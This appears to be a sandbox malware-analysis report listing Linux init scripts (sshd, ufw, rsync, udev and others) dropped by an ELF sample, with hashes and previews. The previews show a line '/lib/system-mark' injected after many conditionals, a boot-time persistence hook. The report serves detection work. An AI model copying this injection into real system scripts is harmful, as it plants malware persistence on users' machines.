                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system-mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} | grep -iq vmware; then./lib/system-mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null || exit 1.
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1401
                                                                                                  Entropy (8bit):5.3052027136710675
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:1sqE3A2EYVwMwRwDTMBgV2APfcVwAPYIpPgfS+VGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzQAsVwAgGYfdVz58Y9f5v
                                                                                                  MD5:2B23E2A5868129F5B68D4465E1FBA27A
                                                                                                  SHA1:8781CE140244ABA8178CCC20B50AB3C252D82A1F
                                                                                                  SHA-256:5D49F02BB6C8C031EA02F67ABFB812EB75425058AD30F44FAB85A9463D2DB1CC
                                                                                                  SHA-512:8DBA742FB4B66C0799E66FA5E070161E2EDBA95A0789A06F51910D659F51E6313D32072078A44B7D2A46CD18B63036F07FBFBD8AEF90843643860424FED398D4
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd || exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash*)....SPLASH="true"....;;....nosplash*|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system-mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):787
                                                                                                  Entropy (8bit):5.274418902272115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCR6D02ygvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgTHygvR4MLoVS
                                                                                                  MD5:92B74D7357C759DB635940F9DBE7A5E8
                                                                                                  SHA1:88C813B379F01849C7A709BF47D8C40AB2A25345
                                                                                                  SHA-256:DBDAB3736BE330D3CC39A75E100F6FB8D9094413A7D24CAC22A8BE39DE25D3C3
                                                                                                  SHA-512:405A8103CE19E154E58A9B0D26C888807F1DE5B3A98EF8C66DF31F3113542215004FD4CD9783C021ED27FEC165B4605CF6B92C141AD9E2BE4872C1D80A34B6E7
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth || exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system-mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop|restart|force-reload)....;;...*)...echo "Usage: ${0} {start|stop|restart|force-reload}" >&2...exit 1...;;.esac..exit 0..
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):942
                                                                                                  Entropy (8bit):5.25253518776668
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:atdRDNeBuYrBMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLEx/25+Z+nMfTWTeCKa3VfhL69z0
                                                                                                  MD5:BEA2BDFD5F7688D4F6E313DC63CA499D
                                                                                                  SHA1:4D6764F461EE096E83A5F5923ED8472A94526E95
                                                                                                  SHA-256:8D2D9E87F61D6D84EFF365927CB97A21EBFC3C9B9BDA48D13858D285AD332466
                                                                                                  SHA-512:932B314974F2AA88FC3E1292729F166EC1459B2951F476F9E9CFA00AC0A36B0687C3CC1BED94B968BBAAF47C3D679CFBE152DFE984E54306800FB85A16DE0F3D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system || STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4639
                                                                                                  Entropy (8bit):5.249855326047257
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:jdRMpo498RXFzyb1U0lKRuHp8gXGHoNURkx:jdRMpJ98g1U0c8JxWINUmx
                                                                                                  MD5:BBBAC3DC084FCC76813396852B0383FE
                                                                                                  SHA1:675F156F5AAF3BFA73C23A1478680F9769D19926
                                                                                                  SHA-256:BF77774A109F072532F634BCC63FB7DA005BEB0D553418FA42DED906F3025EFF
                                                                                                  SHA-512:C7F9AE322C14643F6D711B4B20AD009522B3FE02E986CFB5F839717144BF795E70E17A2745D24E74C4CA76922FF8ED0C1D413F7CEBDECA25CFC52AE4EDE04FA7
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON || exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system-mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2899
                                                                                                  Entropy (8bit):5.275562121366292
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ie3nLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ie3nR5JT
                                                                                                  MD5:5D640A7C6908172899411BF2B8B1DE9C
                                                                                                  SHA1:B3980052CC12A5ACF1DD34D134CD822CAE09C63A
                                                                                                  SHA-256:A40550FEDDF8DB933722514358F364F7CCD50E9EFF123F4F408575BFB0865DE2
                                                                                                  SHA-512:E0AAF4ACC9F2707B6B191A5BDB36711F43D5C1890D5FFD614C03C2525E31F7993BE0308B865DA41B6D4E83A32759AEE91D8B94C293AD6174C2D94633980B3766
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] || exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2293
                                                                                                  Entropy (8bit):5.0050970590485715
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHvdNw5G/9yNuFimjBklJJq5MxnR5/2F:e7Y0u/i5t7RbHwG/9diHlrXnL/iOs1
                                                                                                  MD5:E26E346029E7C03BC1EF969368CF6A1D
                                                                                                  SHA1:7AD4BCFDA2907E9EED7C2DC81820EABFC0132AE7
                                                                                                  SHA-256:B26A28FBDDDCA0E1A9232CF7719860044CB58D34E11AEDC1D53C9D57A689616A
                                                                                                  SHA-512:FBAF8DA2CA6CA008E3D3F1F93C6FAF794A0D62ECD161770F0D00A48697AC190BAB80A13EA1B2D18A4CFD35FA33BEB8891848D5DA67D1DAD2246995CD44B45910
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON || exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system-mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1274
                                                                                                  Entropy (8bit):5.007351824676895
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:c26Nr+XEgBYxABoO21p4rqeYCRjeyvcsTN/RGT7d/LGld/7K9jp:cPQoO23+qeYSjeybRRGHdTGld/7K9jp
                                                                                                  MD5:2CB1D1EE81FD07E07C103CB77A254958
                                                                                                  SHA1:1B94DFA21FF802A7176767B4F0B5EEC16057B5EC
                                                                                                  SHA-256:6DEA1801FFE07EB969A54FA572A6A63C80D570CEABAC7F14BFD51DD40E67FD30
                                                                                                  SHA-512:48556EE1B364DA2B128006C2755F1C665559C2216ECA1CE06D7972A158CD27AB075859ABD842D7C2F118175A5616B6FE5B6288866A55B050A465E699EB67C491
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen || exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR || ! test -d $SCREENDIR; then./lib/system-mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2519
                                                                                                  Entropy (8bit):4.741374235420371
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:DFZazGMU+rI4CXyUH0I6zroGW//AhrHoGx//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGWQRHoGxQuiIngczVII
                                                                                                  MD5:652E57DD61B8A64F80D9CCCD751E4476
                                                                                                  SHA1:1C9E3D8CBCD6F9E6B1B3994D8246C89A52BA84CE
                                                                                                  SHA-256:49FEFA6609A75C4A3624B556F2593A15B2F9E0C173BFB2233B90DBC8BF52E53D
                                                                                                  SHA-512:657C725D48D6A56929530EC68DB98895C4EB7F3A6C94E799FBA2BF48053883F8128C03F934A63E623340FD0433FE5222685CAC501D5C8D9B81317353649E382D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4195
                                                                                                  Entropy (8bit):5.068394475077908
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:jkXSV2xsYJrvcRyAHofonXHeyKyWUkO8IhQ:j1ouYJDc7IQXoXBIhQ
                                                                                                  MD5:C7F75670C4CBACFFCD3EE308F9EC9F4A
                                                                                                  SHA1:4D77E8C62706CB0601CB8031FB0368581E479792
                                                                                                  SHA-256:7E40FB227308DFE02D3F2EDF82B41D0FDF729A942D78D74C72EEA7A82669BE90
                                                                                                  SHA-512:39EB8A235611E0B6EC4C15D5C7D86274573A0C9DFD69E31D1297F50B992B0FF247382E20DAF02133BC7896B0530C215B5A1F870A6F214C9AF0DDB1F70C213CEA
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd || exit 0.( /usr/sbin/sshd -\? 2>&1 | grep -q OpenSSH ) 2>/dev/null || exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system-mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system-mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) || [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system-mark..if [ "$1" = log_end_msg ]; then./lib/system-mark.. log_end_msg 0 || true..fi..if ! run_by_init; then./lib/syst
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7281
                                                                                                  Entropy (8bit):4.982014475224516
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:l7vIwGhwBoNNqeI4OyxwfPlBALWGGgRoG2davbKBJKCrrS2DvwvPmWGPmTbKBJKk:lOWoYiOVlz2B2daxqrS2zwGW51Wymj
                                                                                                  MD5:9C101DF581AD6E404FB99F3B974E743E
                                                                                                  SHA1:CF4A059360FEDD5F371C815772E2BAFC4532E997
                                                                                                  SHA-256:63F0156061B5B581C069F51ED8E3B0473CF796EA88A3BF4BE92B420D529B59AB
                                                                                                  SHA-512:4F7658321F7AC02F9D528088E8A572B8F8549C8FCC61366BDC43ACB61C9C216EBF597D78116A5DB4A42BDC0DC17A4AF6B55C068DB41BDC2DC661900B70A3EDE2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system-mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system-mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system-mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2220
                                                                                                  Entropy (8bit):4.757250053076253
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:1LleiFcd/nzngwPatTM/JrNWwj/Jb/SX9l:1BDFmXOQvJE
                                                                                                  MD5:EA501062EF1DD3FA29A5BC5479E85D5C
                                                                                                  SHA1:997CD2C9A15D23589A8862E2F521A6E40C807311
                                                                                                  SHA-256:90D6965642D81F9AF96BA403FA262381940E73011724178E6B72EC54955C0BCB
                                                                                                  SHA-512:95D16F0A742BA49AA8ABEA1F448F602B4F00ED3DBDD51B25E71C79A68B9F07926B252A9B66D1BFFB760247BD4C605CCD9B4ACCF3ED1D1755A7886651AC6C396D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] || exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system-mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] || [ "$ENABLED" = "YES" ]; then./lib/system-mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` || error="$?". if [ "$error" = "0" ]; then./lib/system-mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system-mark. echo "$output" | while read
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1426
                                                                                                  Entropy (8bit):5.323775798950294
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:aMXni+12wpFKFOGofwvlf/HNVKowwflHBhF/7Px1gr:bni23FKFpbt3GnoHBDbx2
                                                                                                  MD5:0BAD7D02A34912B684C93C71BFD19757
                                                                                                  SHA1:688CF612860E3C7125D34B63F7EF584DC65E4550
                                                                                                  SHA-256:FF796642243AF8B1492D63FF16F761AE942A4AE7CCFA17A05E3CF533B0D6E4DB
                                                                                                  SHA-512:D806A1D5B8AD9AA0A51841825DA8ACD4DA299D331874CD6FD777BCD6802B8BC7498B118B6D85F7E1793749EDCD3ABBD57EA78620226D34E43DA3AE1EE73BA684
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system-mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1358
                                                                                                  Entropy (8bit):5.209136415739334
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:aNmC4ozLk8BZa8LNfwa0aDEPLu5CB5ZM5AHdwi/mqT0KtOC:3VozBjdh0a4PLuIBvMGwitIKtl
                                                                                                  MD5:A18F61759309F7DAE1CF4D379B0DC2E0
                                                                                                  SHA1:38BB4BFF894D6973BC2B59145A28CD93FC2A2B26
                                                                                                  SHA-256:8750FAACA2F9E6ED50996EBA4C23F884241C27A375CCFE79801715044BEA7232
                                                                                                  SHA-512:18489A3A5A446A80D1EEB324AD9823480FF2C53AF1703D4DB6B3DE42A7901B0223135948FD5162F60418F1AB7B7AA1CB3D3CA5C7D1E9E05F6048204DD913D6FB
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON || exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system-mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2911
                                                                                                  Entropy (8bit):4.894244496059908
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:ZETewCRgFkV5ZSVwxcRypF1vrBy9DuIpPX5uCXAepm1L3/WAhyC76XGMgH3:SggFkViVNePT09DuYX5HX3aLdqX8
                                                                                                  MD5:E39C2FE947515C58470F91A5A6D1ED5B
                                                                                                  SHA1:00C7881A33ED0425C236C9544BD43E7BC9AE46DD
                                                                                                  SHA-256:37CCB9BB9C51FEB17B9943BB7DF42E8E03342F5611EC649E5C6E5A87A5A2840D
                                                                                                  SHA-512:AB26218676CEA2C319F29911650AA98C2E7D5578E9E2130D44997FDDE2E59765E1AAC52E0EE2C466E231B55AFFCA92B9C0A67A8381725D5433C3392DE04FF7F3
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system-mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system-mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] || [ -h $DIR ]; then./lib/system-mar
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:Bourne-Again shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):35
                                                                                                  Entropy (8bit):4.261725074756386
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:TKH/binKE:siKE
                                                                                                  MD5:BE6E09DEC0A6249FD83851DAF92AE627
                                                                                                  SHA1:9FF81BB38A0FD5432575455D7D8334BD8D983CF7
                                                                                                  SHA-256:44BDD8B7F00094E163540A2B8C3CF973E72499BAA20B78F8051E2422163E1D0D
                                                                                                  SHA-512:CCF2BDC30F45A132DBDBBF1F008A06525B7EE4A46F09A11025BA05A55835F67356DBB4F8E826AFB28C73AFE5653C09C7CEAA082A2194A0D7C78BE101A4AD1F30
                                                                                                  Malicious:true
